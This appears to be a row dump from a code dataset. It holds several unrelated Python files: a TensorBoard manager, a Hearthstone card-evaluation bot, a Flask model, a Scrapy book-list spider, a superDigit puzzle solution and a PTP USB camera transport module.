text stringlengths 8 6.05M |
|---|
# -*- coding: utf-8 -*-
import os
import sys
import threading
import time
import itertools
from collections import namedtuple
import logging
import six
sys.argv = ["tensorboard"]
from tensorboard.backend import application # noqa
try:
# Tensorboard 0.4.x above series
from tensorboard import default
if not hasattr(application, "reload_multiplexer"):
# Tensorflow 1.12 removed reload_multiplexer, patch it
def reload_multiplexer(multiplexer, path_to_run):
for path, name in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
multiplexer.Reload()
application.reload_multiplexer = reload_multiplexer
if hasattr(default, 'PLUGIN_LOADERS') or hasattr(default, '_PLUGINS'):
# Tensorflow 1.10 or above series
logging.debug("Tensorboard 1.10 or above series detected")
from tensorboard import program
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
argv = [
"",
"--logdir", logdir,
"--reload_interval", str(reload_interval),
"--purge_orphaned_data", str(purge_orphaned_data),
]
tensorboard = program.TensorBoard()
tensorboard.configure(argv)
return application.standard_tensorboard_wsgi(
tensorboard.flags,
tensorboard.plugin_loaders,
tensorboard.assets_zip_provider)
else:
logging.debug("Tensorboard 0.4.x series detected")
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
return application.standard_tensorboard_wsgi(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data,
plugins=default.get_plugins())
except ImportError:
# Tensorboard 0.3.x series
from tensorboard.plugins.audio import audio_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.distribution import distributions_plugin
from tensorboard.plugins.graph import graphs_plugin
from tensorboard.plugins.histogram import histograms_plugin
from tensorboard.plugins.image import images_plugin
from tensorboard.plugins.profile import profile_plugin
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.text import text_plugin
logging.debug("Tensorboard 0.3.x series detected")
_plugins = [
core_plugin.CorePlugin,
scalars_plugin.ScalarsPlugin,
images_plugin.ImagesPlugin,
audio_plugin.AudioPlugin,
graphs_plugin.GraphsPlugin,
distributions_plugin.DistributionsPlugin,
histograms_plugin.HistogramsPlugin,
projector_plugin.ProjectorPlugin,
text_plugin.TextPlugin,
profile_plugin.ProfilePlugin,
]
def create_tb_app(logdir, reload_interval, purge_orphaned_data):
return application.standard_tensorboard_wsgi(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data,
plugins=_plugins)
from .handlers import notebook_dir # noqa
TensorBoardInstance = namedtuple(
'TensorBoardInstance', ['name', 'logdir', 'tb_app', 'thread'])
def start_reloading_multiplexer(multiplexer, path_to_run, reload_interval):
def _ReloadForever():
current_thread = threading.currentThread()
while not current_thread.stop:
application.reload_multiplexer(multiplexer, path_to_run)
current_thread.reload_time = time.time()
time.sleep(reload_interval)
thread = threading.Thread(target=_ReloadForever)
thread.reload_time = None
thread.stop = False
thread.daemon = True
thread.start()
return thread
def TensorBoardWSGIApp(logdir, plugins, multiplexer,
reload_interval, path_prefix="", reload_task="auto"):
path_to_run = application.parse_event_files_spec(logdir)
if reload_interval:
thread = start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval)
else:
application.reload_multiplexer(multiplexer, path_to_run)
thread = None
tb_app = application.TensorBoardWSGI(plugins)
manager.add_instance(logdir, tb_app, thread)
return tb_app
application.TensorBoardWSGIApp = TensorBoardWSGIApp
class TensorboardManger(dict):
def __init__(self):
self._logdir_dict = {}
def _next_available_name(self):
for n in itertools.count(start=1):
name = "%d" % n
if name not in self:
return name
def new_instance(self, logdir, reload_interval):
if not os.path.isabs(logdir) and notebook_dir:
logdir = os.path.join(notebook_dir, logdir)
if logdir not in self._logdir_dict:
purge_orphaned_data = True
reload_interval = reload_interval or 30
create_tb_app(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data)
return self._logdir_dict[logdir]
def add_instance(self, logdir, tb_application, thread):
name = self._next_available_name()
instance = TensorBoardInstance(name, logdir, tb_application, thread)
self[name] = instance
self._logdir_dict[logdir] = instance
def terminate(self, name, force=True):
if name in self:
instance = self[name]
if instance.thread is not None:
instance.thread.stop = True
del self[name], self._logdir_dict[instance.logdir]
else:
raise Exception("There's no tensorboard instance named %s" % name)
manager = TensorboardManger()
|
def xor_sum(a, b):
result = []
total_sum = None
for i in a:
for j in b:
result.append(i+j)
total_sum = result[0]
for k in range(1, len(result)):
total_sum = total_sum ^ result[k]
print(total_sum)
xor_sum([4, 6, 0, 0, 3, 3], [0, 5, 6, 5, 0, 3])
x = 2
y = 3
print(x & y)
print(x | y)
print(x ^ y)
print(~x)
print(y << 1)
print(x >> 1)
|
from tables import Enum
from Util_new import Cardtype, split, Zone, Option, ThreatClasses
from Board import getEnemyCards, getMyCards,getCardByIngameId, isMyCard,\
getMyHandcardCount, getEnemyHandcardCount, getMyHero, getMyMana
raceDict = {1: 'minion', 2: 'beast', 3: 'mech', 4: 'dragon', 5: 'pirate', 6: 'demon', 7: 'murloc', 8: 'character', 9: 'hero', 10: 'weapon'}
def getRaceDict():
global raceDict
return raceDict
class Side(Enum):
MY = 0
ENEMY = 1
BOTH = 2
class Effect(Enum):
DAMAGE = 'damage'
RESTORE = 'restore'
RETURN = 'return'
DESTROY = 'destroy'
GAIN = 'gain'
TRANSFORM = 'transform'
ADD = 'add'
EQUIP = 'equip'
DRAW = 'draw'
DISCARD = 'discard'
AURA = 'aura'
GIVE = 'give'
OVERLOAD = 'overload'
HAVE = 'have +'
def findTargetsInText(card, text):
try:
_race = None
for race in getRaceDict().values():
if race in text:
_race = race
if 'enemies' in text or 'enemy' in text:
cards = [c for c in getEnemyCards().values() if c.compareZone(Zone.PLAY)]
elif 'friendly' in text or 'your' in text:
if 'other' in text:
cards = [c for c in getMyCards().values() if c.compareZone(Zone.PLAY) and not c._ingameID == card._ingameID]
else:
cards = [c for c in getMyCards().values() if c.compareZone(Zone.PLAY)]
else:
if 'other' in text:
cards = [c for c in getEnemyCards().values() if c.compareZone(Zone.PLAY)]
+ [c for c in getMyCards() if c.compareZone(Zone.PLAY) and not c._ingameID == card._ingameID]
elif 'all' in text:
cards = [c for c in getEnemyCards().values() if c.compareZone(Zone.PLAY)]
+ [c for c in getMyCards().values() if c.compareZone(Zone.PLAY)]
else:
cards = None
if _race is not None and cards is not None:
if _race == 'character':
pass
elif _race == 'hero':
cards = [c for c in cards if card.compareCardtype(Cardtype.HERO)]
else:
if _race == 'minion':
cards = [c for c in cards if card.compareCardtype(Cardtype.MINION)]
else:
cards = [c for c in cards if card.compareCardtype(Cardtype.MINION) and cards._race == _race]
return cards
except Exception, e:
print 'findTargetsInText()', e
def damageEffect(target, text, cost):
try:
if 'deal' in text:
amount = split(text, 'deal', 'damage')
if '-' in amount:
a1, a2 = amount.split('-')
amount = ((int(a1) + int(a2))/2.0)
elif amount == '':
pass
else:
amount = int(amount)
if isMyCard(target._ingameID):
value = amount
if target.getHealth() <= amount and not target._divineShield:
value = value + (target._manacosts/2.0)
else:
value = (-1 * amount)
if target.compareCardtype(Cardtype.MINION):
if not target._divineShield:
if target.getHealth() < amount:
value = value - (round(target._manacosts/2.0, 0))
elif target.getHealth() == amount:
value = (value - (round(target._manacosts/2.0, 0))) * 2
if target.compareCardtype(Cardtype.HERO):
if target.getHealth() <= amount:
value = value - (round(target._manacosts/2.0, 0)) - 10
return value
except Exception, e:
print 'damageEffect()', e
def restoreEffect(target, text, cost):
try:
if 'restore' in text:
if 'full health' in text:
amount = target.getDamage()
else:
amount = split(text, 'restore', 'health')
value = (-1*amount)
if isMyCard(target._ingameID) and target.getDamage() <= amount:
value = value - (target._manacosts/2.0)
elif not isMyCard(target._ingameID) and target.getDamage() <= amount:
value = value + (target._manacosts/2.0)
return value
except Exception, e:
print 'restoreEffect()', e
def transformEffect(target, text, cost):
try:
if 'transform' in text:
health, atk = text.split('/')
health = int(health.split('into a ')[1])
atk = int(atk.split(' ')[0])
if isMyCard(target._ingameID) and target.getHealth() < health and target.getAttack() < atk:
return (-1 * target._manacosts)
elif not isMyCard(target._ingameID) and target.getHealth() > health and target.getAttack() > atk:
return (-1 * target._manacosts)
else:
return 0
except Exception, e:
print 'transformEffect()', e
def giveEffect(target, text, cost, threatClass):
try:
if 'give' in text or 'have +' in text:
atk = 0
hlt = 0
if 'attack' in text and not 'health' in text:
atk = int(split(text, '+', ' '))
elif 'health' in text and not 'attack' in text:
hlt = int(split(text, '+', ' '))
else:
atk = int(split(text, '+', '/'))
hlt = int(split(text, '+', ' '))
value = (-1 * (atk/2.0) + (hlt/2.0))
if 'charge' in text:
value = value - 1
if 'taunt' in text:
value = value - 1
if threatClass == ThreatClasses.DEFENSE_THREAT or threatClass == ThreatClasses.THREAT:
value = value - (threatClass - 1)
if 'windfury' in text:
value = value - 2
if 'divine shield' in text:
value = value - 1
if 'stealth' in text:
value = value - 1
if 'end of turn' in text:
value = value + 1
if isMyCard(target._ingameID):
return value
else:
return (-1 * value)
except Exception, e:
print 'giveEffect()', e
def destroyEffect(target, text, cost):
try:
if isMyCard(target._ingameID):
return target._manacosts
else:
return (-1 * target._manacosts)
except Exception, e:
print 'destroyEffect()', e
def returnEffect(target, text, cost):
try:
if isMyCard(target._ingameID):
pass
else:
pass
except Exception, e:
print 'returnEffect()', e
def drawEffect(text, cost):
try:
amount = split(text, 'draw ', ' card')
try:
amount = int(amount)
except:
if amount == 'a':
amount = 1
elif amount == 'two':
amount = 2
value = (-2 * amount)
if 'each player draw' in text:
if getEnemyHandcardCount() + amount > 10:
value = value - 1
else:
value = value + 1
if getMyHandcardCount() + amount > 10:
value = value + 1
elif 'your opponent draw' in text:
if getEnemyHandcardCount() + amount > 10:
value = value - 1
else:
value = value + 1
else:
if getMyHandcardCount() + amount > 10:
value = value + 1
return value
except Exception, e:
print 'drawEffect()', e
def gainEffect(text, cost):
try:
if 'mana crystal' in text:
try:
mana = int(split(text, 'gain ', ' mana'))
except:
if 'an' in text:
mana = 1
if 'this turn only' in text:
hand = [c for c in getMyCards().values() if c.compareZone(Zone.HAND) and c.compareCardtype(Cardtype.MINION)]
resources = getMyMana()
cardWithHigherCosts = False
for c in hand:
if c._manacosts == resources + mana:
cardWithHigherCosts = True
print c._name
break
if cardWithHigherCosts:
mana = (mana/2.0)
else:
mana = -1
return (-1 * mana)
elif 'armor' in text:
armor = split(text, 'gain ', ' armor')
return (-1 * armor)
elif 'health' in text:
hlt = int(split(text, '+', 'attack'))
return (-1 * (hlt/2))
elif 'attack' in text:
atk = int(split(text, '+', 'attack'))
return (-1 * (atk/2))
elif '+' in text and '/' in text:
atk = int(split(text, '+', '/'))
hlt = int(text.split('/+')[1][:1])
return (-1 * ((atk + hlt)/2.0))
except Exception, e:
print 'gainEffect()', e
def discardEffect(text, cost):
try:
pass
except Exception, e:
print 'discardEffect()', e
def addEffect(text, cost):
try:
if 'spare part' in text:
return -1
except Exception, e:
print 'addEffect()', e
def equipEffect(text, cost):
try:
if 'equip' in text:
atk = int(split(text, 'equip a ' '/'))
hlt = int(split(text, '/', ''))
return (-1 * ((atk + hlt)/2.0))
except Exception, e:
print 'equipEffect()', e
def summonEffect(text, cost):
try:
if 'summon' in text:
amount = split(text, 'summon', '/')
amount, atk = amount.split(' ')
hlt = int(split('/', ' '))
atk = int(atk)
if amount == 'a':
amount = 1
elif amount == 'two':
amount = 2
elif amount == 'three':
amount = 3
elif amount == 'five':
amount = 5
return (-1 * (amount * ((atk + hlt)/2.0)))
except Exception, e:
print 'summonEffect()', e
def costEffect(text, cost):
try:
if 'cost' in text:
amount = int(split(text, '(', ')'))
if 'less' in text:
return amount
elif 'more' in text:
return (amount * -1)
except Exception, e:
print 'costEffect()', e
def overloadEffect(text, cost):
try:
amount = split(text, 'overload:', ')')
amount = int(amount.split('(')[1])
return cost + round(amount/2.0,0)
except Exception, e:
print 'overloadEffect()', e
def attackEffectivness(attacker, target, threatClass):
try:
value = 0
atk = attacker.getHealth() - target.getAttack()
tar = target.getHealth() - attacker.getAttack()
if not isMyCard(target._ingameID):
if not target.compareCardtype(Cardtype.HERO):
if target._divineShield:
if attacker._divineShield:
value = -2
elif attacker.getAttack() == 1:
if atk > 0:
value = -2
else:
value = -1
elif attacker.getAttack() > 1:
if atk > 0:
value = -1
else:
value = 0
elif attacker._divineShield:
if tar <= 0:
value = (target._manacosts *-1) - 1
else:
value = 0
elif target.getHealth() == attacker.getAttack():
value = (target._manacosts *-1) - 0.5
elif target.getHealth() < attacker.getAttack():
value = target._manacosts * -1
else:
value = 0
if atk > 0:
if atk == attacker.getHealth():
value = value - 1
else:
value = value + 1
if tar > 0 and not target.compareCardtype(Cardtype.HERO):
value = value + 1
elif tar <= 0 and target.compareCardtype(Cardtype.HERO):
value = value - 10
if threatClass == ThreatClasses.DEFENSE or threatClass == ThreatClasses.DEFENSE_THREAT or threatClass == ThreatClasses.THREAT:
value = value - threatClass
return value
else:
return 3
except Exception, e:
print 'attackEffectiness()', e
def abilityWithoutTarget(text, cost):
try:
value = cost
if Effect.GAIN in text:
value = value + gainEffect(text, cost)
if Effect.ADD in text:
value = value + gainEffect(text, cost)
if Effect.DRAW in text:
value = value + drawEffect(text, cost)
if Effect.EQUIP in text:
value = value + equipEffect(text, cost)
if Effect.DISCARD in text:
value = value + discardEffect(text, cost)
if Effect.OVERLOAD in text:
value = value + overloadEffect(text, cost)
return value
except Exception, e:
print 'abilityWithoutTarget()', e
def abilityOnSingleTarget(target, text, cost, threatClass):
try:
value = cost
if Effect.DAMAGE in text:
value = value + damageEffect(target, text, cost)
if Effect.RESTORE in text:
value = value + restoreEffect(target, text, cost)
if Effect.TRANSFORM in text:
value = value + transformEffect(target, text, cost)
if Effect.GIVE in text or Effect.HAVE in text:
value = value + giveEffect(target, text, cost, threatClass)
if Effect.DESTROY in text:
value = value + destroyEffect(target, text, cost)
if Effect.RETURN in text:
value = value + returnEffect(target, text, cost)
if Effect.GAIN in text:
value = value + gainEffect(text, cost)
if Effect.ADD in text:
value = value + gainEffect(text, cost)
if Effect.DRAW in text:
value = value + drawEffect(text, cost)
if Effect.EQUIP in text:
value = value + equipEffect(text, cost)
if Effect.DISCARD in text:
value = value + discardEffect(text, cost)
if Effect.OVERLOAD in text:
value = value + overloadEffect(text, cost)
return value
except Exception, e:
print 'abilityOnSingleTarget()', e
def abilityOnGroupOfTargets(text, cost, targets):
_sum = 0
for t in targets:
_sum = _sum + abilityOnSingleTarget(t, text, cost, ThreatClasses.NONE)
return _sum
def abilityEffectivness(card, text, cost, targets, threatClass):
try:
if targets is None and card._text is not None:
targets = findTargetsInText(card, text)
if targets is None:
effectivness = abilityWithoutTarget(text, cost)
else:
effectivness = abilityOnGroupOfTargets(text, cost, targets)
else:
effectivness = abilityOnSingleTarget(targets, text, cost, threatClass)
if targets is None and 'random' in text:
effectivness = (effectivness / len(targets))
if card.compareCardtype(Cardtype.MINION):
if card._taunt:
effectivness = effectivness - 1
if threatClass == ThreatClasses.DEFENSE_THREAT or threatClass == ThreatClasses.THREAT:
effectivness = effectivness - (threatClass - 1)
if card._windfury:
effectivness = effectivness - (card._attack/2.0)
if card._charge:
effectivness = effectivness - 1
if threatClass == ThreatClasses.DEFENSE_THREAT or threatClass == ThreatClasses.THREAT:
effectivness = effectivness - (threatClass / 2.0)
if card._divineShield:
effectivness = effectivness - 1
return effectivness
except Exception, e:
print 'abilityEffectivness()', e
def nonMinionEffectivness(card, target):
return abilityEffectivness(card, card._text, card._manacosts, target, ThreatClasses.NONE)
def minionEffectivness(card, targets, threatClass):
mana = card._manacosts
mana = mana - ((card._attack + card._health)/2.0)
if card._text is not None:
mana = abilityEffectivness(card, card._text, mana, targets, threatClass) #abilityEffectivness returns negative values for effective cards
enemyDmg = [c.getAttack() for c in getEnemyCards().values() if c.compareZone(Zone.PLAY) and c.compareCardtype(Cardtype.MINION)]
dmg = 0
for d in enemyDmg:
dmg = dmg + d
if card._attack > dmg:
mana = mana - (card._attack - dmg)
return mana
def playEffectivness(card, target, threatClass):
if card.compareCardtype(Cardtype.MINION):
return minionEffectivness(card, target, threatClass)
else:
return nonMinionEffectivness(card, target)
def effectivness(option, threatClass):
try:
bestAttack = None
bestPlay = None
card = getCardByIngameId(option[0])
if option[2] is not None:
targets = [getCardByIngameId(Id) for Id in option[2]]
else:
targets = None
if option[1] == Option.ATTACK:
for t in targets:
eff = attackEffectivness(card, t, threatClass)
if bestAttack is None or eff < bestAttack[0]:
bestAttack = (eff, card, t)
elif option[1] == Option.PLAY:
if targets is None:
bestPlay = (playEffectivness(card, None, threatClass), card, None)
else:
for t in targets:
eff = playEffectivness(card, t, threatClass)
if bestPlay is None or eff < bestPlay[0]:
bestPlay = (eff, card, t)
if bestAttack is None:
return (Option.PLAY, bestPlay)
else:
return (Option.ATTACK, bestAttack)
except Exception, e:
print 'effectivness()', e
def enemyHasDefense(targets):
try:
defense = [t for t in targets if (t.compareCardtype(Cardtype.MINION) and t._taunt) or t._id == 'GVG_021' or t.getAttack() >= 6]
return (len(defense) > 0, defense)
except Exception, e:
print 'enemyHasDefense()', e
def enemyHasThreat(targets):
try:
threat = []
potentialDmg = 0
myDamage = [c.getAttack() for c in getMyCards().values() if c.compareZone(Zone.PLAY)]
Damage = 0
for d in myDamage:
Damage = Damage + d
for t in targets:
potentialDmg = potentialDmg + t.getAttack()
if potentialDmg >= getMyHero().getHealth() or Damage < potentialDmg:
for t in targets:
atk = t.getAttack()
if t.compareCardtype(Cardtype.MINION):
if t._windfury:
atk = atk * 2
if atk > 3:
threat.append(t)
if len(threat) > 0:
return (True, threat)
return (False, threat)
except Exception, e:
print 'enemyHasThreat()', e
def sortAfterStrength(minions):
try:
retVal = []
for m in minions:
if retVal == []:
retVal.append(m)
continue
i = 0
while i < len(retVal):
if m.getAttack() > retVal[i].getAttack():
retVal.insert(i, m)
break
i = i + 1
if m not in retVal:
retVal.append(m)
return retVal
except Exception, e:
print 'sortAfterStrength()', e
def isMyDefenseStrong(minions,targets):
try:
potentialDmg = 0
for t in targets:
potentialDmg = potentialDmg + t.getAttack()
weaponAtk = [c for c in getEnemyCards().values() if c.compareZone(Zone.WEAPON)]
if not weaponAtk == []:
potentialDmg = potentialDmg + weaponAtk[0].getAttack()
targets.append(weaponAtk[0])
defense = 0
taunts = []
for m in minions:
if m._taunt:
defense = defense + m.getHealth()
taunts.append(m)
if defense >= potentialDmg:
return True
elif len(taunts) >= len(targets):
return True
else:
targets = sortAfterStrength(targets)
for t in targets:
potentialDmgAfterReduction = potentialDmg - t.getAttack()
if potentialDmgAfterReduction > defense:
return False
except Exception, e:
print 'isMyDefenseStrong()', e
def options(options):
try:
if len(options) > 1:
enemyTargets = [c for c in getEnemyCards().values() if c.compareZone(Zone.PLAY)]
myBoard = [c for c in getMyCards().values() if c.compareZone(Zone.PLAY)]
defense = enemyHasDefense(enemyTargets)
threat = enemyHasThreat(enemyTargets)
threatClass = ThreatClasses.NONE
if defense[0]:
if threat[0]:
threatClass = ThreatClasses.DEFENSE_THREAT
else:
threatClass = ThreatClasses.DEFENSE
for index,option in enumerate(options):
if option[2] is None:
continue
else:
new_opt_id = []
for Id in option[2]:
card = getCardByIngameId(Id)
if threat[0]:
if card in defense[1] or card in threat[1]:
new_opt_id.append(Id)
else:
if card in defense[1]:
new_opt_id.append(Id)
options[index] = (option[0], option[1], new_opt_id)
elif threat[0]:
threatClass = ThreatClasses.THREAT
for option in enumerate(options):
if option[2] is None:
continue
else:
new_opt_id = []
for Id in option[2]:
if getCardByIngameId(Id) in threat[1]:
new_opt_id.append(Id)
options[index] = (option[0], option[1], new_opt_id)
if isMyDefenseStrong(myBoard, enemyTargets):
threatClass = ThreatClasses.STRONG_DEFENSE
for index, option in enumerate(options):
if option[2] is None:
continue
elif option[1] == Option.ATTACK and getCardByIngameId(option[0])._taunt:
new_opt_id = []
for Id in option[2]:
if not isMyCard(Id) and not getCardByIngameId(Id).compareCardtype(Cardtype.HERO):
new_opt_id.append(Id)
options[index] = (option[0], option[1], new_opt_id)
else:
new_opt_id = []
for Id in option[2]:
if not isMyCard(Id) and getCardByIngameId(Id) not in threat[1]:
new_opt_id.append(Id)
options[index] = (option[0], option[1], new_opt_id)
efficiency = None
for option in options:
if option == options[0]:
continue
eff = effectivness(option, threatClass)
if efficiency is None:
efficiency = eff
elif eff[0] == Option.PLAY and efficiency[0] == eff[0] and efficiency[1][0] == eff[1][0]:
if eff[1][1].compareCardtype(Cardtype.MINION) and efficiency[1][1].compareCardtype(Cardtype.MINION):
if eff[1][1]._attack < efficiency[1][1]._attack:
eff = efficiency
elif eff[0] == Option.PLAY and efficiency[0] == eff[0] and efficiency[1][0] > eff[1][0]:
efficiency = eff
elif eff[0] == Option.ATTACK and efficiency[0] == eff[0]:
if efficiency[1][0] < eff[1][0]:
efficiency = eff
elif efficiency[1][0] == eff[1][0]:
if eff[1][1].getAttack() > efficiency[1][1].getAttack():
efficiency = eff
elif eff[0] == Option.ATTACK and not efficiency[0] == eff[0]:
if efficiency[0] < -7 and eff[1][0] == -2:
efficiency = eff
elif eff[0] == Option.PLAY and not efficiency[0] == eff[0]:
if eff[1][0] > -7:
efficiency = eff
if efficiency[0] == Option.PLAY and efficiency[1][0] > 0:
return options[0]
else:
return (efficiency[0], efficiency[1][1], efficiency[1][2])
except Exception, e:
print 'options()', e
|
# Variable global para mantener activo el item en el navBar, sitios
def url(request):
value = {'url': request.path}
return value
|
from db import db
class ClosetModel(db.Model):
__tablename__ = 'closet'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(80))
phone_number = db.Column(db.String(80))
carrier = db.Column(db.String(80))
items = db.relationship('ItemModel', lazy='dynamic')
user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
user = db.relationship('UserModel')
def __init__(self, name, user_id, phone_number, carrier):
self.name = name
self.user_id = user_id
self.phone_number = phone_number
self.carrier = carrier
# def __init__(self, name):
# self.name = name
def json(self):
return {
'_id': self.id,
'name': self.name,
'user_id': self.user_id,
'phone_number': self.phone_number,
'carrier': self.carrier,
'items': [item.json() for item in self.items.all()]
}
@classmethod
def find_by_id(cls, _id):
return cls.query.filter_by(id=_id).first()
@classmethod
def find_by_uid(cls, uid):
return cls.query.filter_by(user_id=uid).first()
@classmethod
def find_by_name(cls, name):
return cls.query.filter_by(name=name).first()
def save_to_db(self):
db.session.add(self)
db.session.commit()
def delete_from_db(self):
db.session.delete(self)
db.session.commit()
|
"""
created by ldolin
"""
import scrapy
from learn.items import PaquItem
class PaquSpider(scrapy.Spider):
name = "paqu1"
start_urls = ["https://www.23us.so/list/1_1.html",
"https://www.23us.so/list/2_1.html",
"https://www.23us.so/list/3_1.html",
"https://www.23us.so/list/4_1.html",
"https://www.23us.so/list/5_1.html",
"https://www.23us.so/list/6_1.html",
"https://www.23us.so/list/7_1.html",
"https://www.23us.so/list/8_1.html",
"https://www.23us.so/list/9_1.html"]
def parse(self, response):
urls = response.xpath('//tr/td[@class="L"]/a/@href').extract()
for url in urls:
yield scrapy.Request(url, callback=self.parse_info)
def parse_info(self, response):
# 书名 和 作者
book_name = response.xpath('//tr[@bgcolor="#FFFFFF"]/td[1]/a/text()').extract_first()
author = response.xpath('//tr[@bgcolor="#FFFFFF"]/td[3]/text()').extract_first() # .replace(" ", "")
zishu = response.xpath('//tr[@bgcolor="#FFFFFF"]/td[4]').extract_first()
zt = response.xpath('//tr[@bgcolor="#FFFFFF"]/td[6]/text()').extract_first()
print("书名:%s,作者:%s,%s,%s" % (book_name, author,zishu,zt))
item = PaquItem()
item['book_name'] = book_name
item['author'] = author
item['zishu'] = zishu
item['zt'] = zt
yield item
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the superDigit function below.
# recursive but fails for 3 testcases - might be stack overflow - python limit of 995 stacks
def superDigit(n, k=1):
sum = int(n[0:1])
if len(n) > 1:
sum += superDigit(n[1:])
sum *= k
if sum > 9:
sum %= 9
sum = 9 if sum == 0 else sum
return sum
# non recursive
def superDigit_non_recursive(n, k=1):
sd = int(n) * k % 9
return sd if sd else 9
if __name__ == '__main__':
nk = input().split()
n = nk[0]
k = int(nk[1])
result = superDigit(n, k)
print(result) |
'''This module implements the USB transport layer for PTP.
It exports the PTPUSB class. Both the transport layer and the basic PTP
implementation are Vendor agnostic. Vendor extensions should extend these to
support more operations.
'''
from __future__ import absolute_import
import atexit
import logging
import usb.core
import six
import array
from usb.util import (
endpoint_type, endpoint_direction, ENDPOINT_TYPE_BULK, ENDPOINT_TYPE_INTR,
ENDPOINT_OUT, ENDPOINT_IN,
)
from ..ptp import PTPError
from ..util import _main_thread_alive
from construct import (
Bytes, Container, Embedded, Enum, ExprAdapter, Int16ul, Int32ul, Pass,
Range, Struct,
)
from threading import Thread, Event, RLock
from six.moves.queue import Queue
from hexdump import hexdump
logger = logging.getLogger(__name__)
__all__ = ('USBTransport', 'find_usb_cameras')
__author__ = 'Luis Mario Domenzain'
PTP_USB_CLASS = 6
class find_class(object):
def __init__(self, class_, name=None):
self._class = class_
self._name = name
def __call__(self, device):
if device.bDeviceClass == self._class:
return (
self._name in usb.util.get_string(device, device.iProduct)
if self._name else True
)
for cfg in device:
intf = usb.util.find_descriptor(
cfg,
bInterfaceClass=self._class
)
if intf is not None:
return (
self._name in usb.util.get_string(device, device.iProduct)
if self._name else True
)
return False
def find_usb_cameras(name=None):
return usb.core.find(
find_all=True,
custom_match=find_class(PTP_USB_CLASS, name=name)
)
class USBTransport(object):
'''Implement USB transport.'''
def __init__(self, *args, **kwargs):
device = kwargs.get('device', None)
'''Instantiate the first available PTP device over USB'''
logger.debug('Init USB')
self.__setup_constructors()
# If no device is specified, find all devices claiming to be Cameras
# and get the USB endpoints for the first one that works.
if device is None:
logger.debug('No device provided, probing all USB devices.')
if isinstance(device, six.string_types):
name = device
logger.debug(
'Device name provided, probing all USB devices for {}.'
.format(name)
)
device = None
else:
name = None
devs = (
[device] if (device is not None)
else find_usb_cameras(name=name)
)
self.__claimed = False
self.__acquire_camera(devs)
self.__event_queue = Queue()
self.__event_shutdown = Event()
# Locks for different end points.
self.__inep_lock = RLock()
self.__intep_lock = RLock()
self.__outep_lock = RLock()
# Slightly redundant transaction lock to avoid catching other request's
# response
self.__transaction_lock = RLock()
self.__event_proc = Thread(
name='EvtPolling',
target=self.__poll_events
)
self.__event_proc.daemon = False
atexit.register(self._shutdown)
self.__event_proc.start()
def __available_cameras(self, devs):
for dev in devs:
if self.__setup_device(dev):
logger.debug('Found USB PTP device {}'.format(dev))
yield
else:
message = 'No USB PTP device found.'
logger.error(message)
raise PTPError(message)
def __acquire_camera(self, devs):
'''From the cameras given, get the first one that does not fail'''
for _ in self.__available_cameras(devs):
# Stop system drivers
try:
if self.__dev.is_kernel_driver_active(
self.__intf.bInterfaceNumber):
try:
self.__dev.detach_kernel_driver(
self.__intf.bInterfaceNumber)
except usb.core.USBError:
message = (
'Could not detach kernel driver. '
'Maybe the camera is mounted?'
)
logger.error(message)
except NotImplementedError as e:
logger.debug('Ignoring unimplemented function: {}'.format(e))
# Claim camera
try:
logger.debug('Claiming {}'.format(repr(self.__dev)))
usb.util.claim_interface(self.__dev, self.__intf)
self.__claimed = True
except Exception as e:
logger.warn('Failed to claim PTP device: {}'.format(e))
continue
self.__dev.reset()
break
else:
message = (
'Could not acquire any camera.'
)
logger.error(message)
raise PTPError(message)
def _shutdown(self):
logger.debug('Shutdown request')
self.__event_shutdown.set()
# Free USB resource on shutdown.
# Only join a running thread.
if self.__event_proc.is_alive():
self.__event_proc.join(2)
try:
if self.__claimed:
logger.debug('Release {}'.format(repr(self.__dev)))
usb.util.release_interface(self.__dev, self.__intf)
except Exception as e:
logger.warn(e)
# Helper methods.
# ---------------------
def __setup_device(self, dev):
'''Get endpoints for a device. True on success.'''
self.__inep = None
self.__outep = None
self.__intep = None
self.__cfg = None
self.__dev = None
self.__intf = None
# Attempt to find the USB in, out and interrupt endpoints for a PTP
# interface.
for cfg in dev:
for intf in cfg:
if intf.bInterfaceClass == PTP_USB_CLASS:
for ep in intf:
ep_type = endpoint_type(ep.bmAttributes)
ep_dir = endpoint_direction(ep.bEndpointAddress)
if ep_type == ENDPOINT_TYPE_BULK:
if ep_dir == ENDPOINT_IN:
self.__inep = ep
elif ep_dir == ENDPOINT_OUT:
self.__outep = ep
elif ((ep_type == ENDPOINT_TYPE_INTR) and
(ep_dir == ENDPOINT_IN)):
self.__intep = ep
if not (self.__inep and self.__outep and self.__intep):
self.__inep = None
self.__outep = None
self.__intep = None
else:
logger.debug('Found {}'.format(repr(self.__inep)))
logger.debug('Found {}'.format(repr(self.__outep)))
logger.debug('Found {}'.format(repr(self.__intep)))
self.__cfg = cfg
self.__dev = dev
self.__intf = intf
return True
return False
def __setup_constructors(self):
'''Set endianness and create transport-specific constructors.'''
# Set endianness of constructors before using them.
self._set_endian('little')
self.__Length = Int32ul
self.__Type = Enum(
Int16ul,
default=Pass,
Undefined=0x0000,
Command=0x0001,
Data=0x0002,
Response=0x0003,
Event=0x0004,
)
# This is just a convenience constructor to get the size of a header.
self.__Code = Int16ul
self.__Header = Struct(
'Length' / self.__Length,
'Type' / self.__Type,
'Code' / self.__Code,
'TransactionID' / self._TransactionID,
)
# These are the actual constructors for parsing and building.
self.__CommandHeader = Struct(
'Length' / self.__Length,
'Type' / self.__Type,
'OperationCode' / self._OperationCode,
'TransactionID' / self._TransactionID,
)
self.__ResponseHeader = Struct(
'Length' / self.__Length,
'Type' / self.__Type,
'ResponseCode' / self._ResponseCode,
'TransactionID' / self._TransactionID,
)
self.__EventHeader = Struct(
'Length' / self.__Length,
'Type' / self.__Type,
'EventCode' / self._EventCode,
'TransactionID' / self._TransactionID,
)
# Apparently nobody uses the SessionID field. Even though it is
# specified in ISO15740:2013(E), no device respects it and the session
